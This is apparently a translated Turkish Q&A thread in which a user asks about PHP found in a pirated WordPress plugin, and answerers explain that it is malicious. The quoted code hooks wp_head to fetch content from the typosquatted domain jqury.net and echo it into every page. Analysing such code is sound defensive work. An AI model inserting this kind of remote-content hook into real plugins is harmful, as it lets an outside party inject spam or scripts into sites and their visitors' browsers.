Bunu bir eklentide buldum. Bu ne işe yarıyor? Bu tehlikeli mi?


17

Bunu bir eklentide buldum. Bu ne işe yarıyor? Bu tehlikeli mi?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

5
Hangi eklenti bu?
Daniel

Eklentiyi resmi WP sitesinden aldınız mı?
Brezilyalı Adam

1
Bu bir eklenti içinde müşterilerim ağ kurulumunda çalıştırmak istedi. Eklenti bunu wp-admin'de çalıştırmak istedi. Bunu okuduktan sonra nereden geldiğini sordum. Bir torrentden boş bir eklenti. Kısa cevap erm NO xXx oldu
Sofia Rose

Yanıtlar:


16

Spam içeren bir biçimlendirme bloğu yükler (kaynağın bir kısmını yayınlamayı düşündüm, ancak içeriğin herhangi bir şekilde reklamını yapmak istemiyorum), alanın yakın bir şekilde yanlış yazılmış bir alanından-- http://jquery.com/- jQuery tarafından kullanılır , saygın ve popüler bir Javascript kütüphanesi ve WordPress'in Core'a dahil olduğu bir kütüphanedir. Bence bu fikir çok farklı bir şey yüklerken o kütüphaneyi yüklüyor gibi görünüyor.

Ve başka bir şekilde jQuery yüklüyor gibi görünüyor. Değişken adına dikkat edin $jquery.

Kötü amaçlı komut dosyaları da yüklemeyi deneyebilir. Kontrol etmedim. Ben ediyorum sayfadaki içerik her zaman kontrolörleri gibi hissediyorum etki alanını değiştirebilir özellikle kesinlikle tehlikeli diyoruz.

Arama motorları spam yayan sitelere baktıkça en iyi ihtimalle sitenize zarar verecektir.

Kullanma. Siteyi işleten kişiler dışında sizin veya web üzerindeki herkes için yararlı bir şey yapmaz. Bunu saygın bir sitede bulduysanız, onlara bildirin.


7

Evet, bir spam sitesinden içerik yüklemek tehlikeli bir koddur.

Eklentiyi adlandırmadınız, ancak bu kodu web sitenize yüklendikten sonra bulduysanız, eklenti kodunun geliştiriciden böyle gelmediği, ancak yüklendikten sonra saldırıya uğradığı mümkündür. Bu durumda, kötü amaçlı kodu web sitenizde bu eklentiden daha fazla bulabilirsiniz.

İndirilen eklenti kodunu, eklentiyi ilk aldığınız yerden kontrol edin ve bu kötü amaçlı kodun orijinal olarak orada olup olmadığını görün. Değilse, siteniz saldırıya uğradı. Bunun böyle olduğunu belirlerseniz , Kodeksi'nden bu makaleyi okuyun .


3
Bu bir eklenti içinde müşterilerim ağ kurulumunda çalıştırmak istedi. Eklenti bunu wp-admin'de çalıştırmak istedi. Bunu okuduktan sonra nereden geldiğini sordum. Bir torrentden boş bir eklenti. Kısa cevap erm NO xXx oldu
Sofia Rose
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.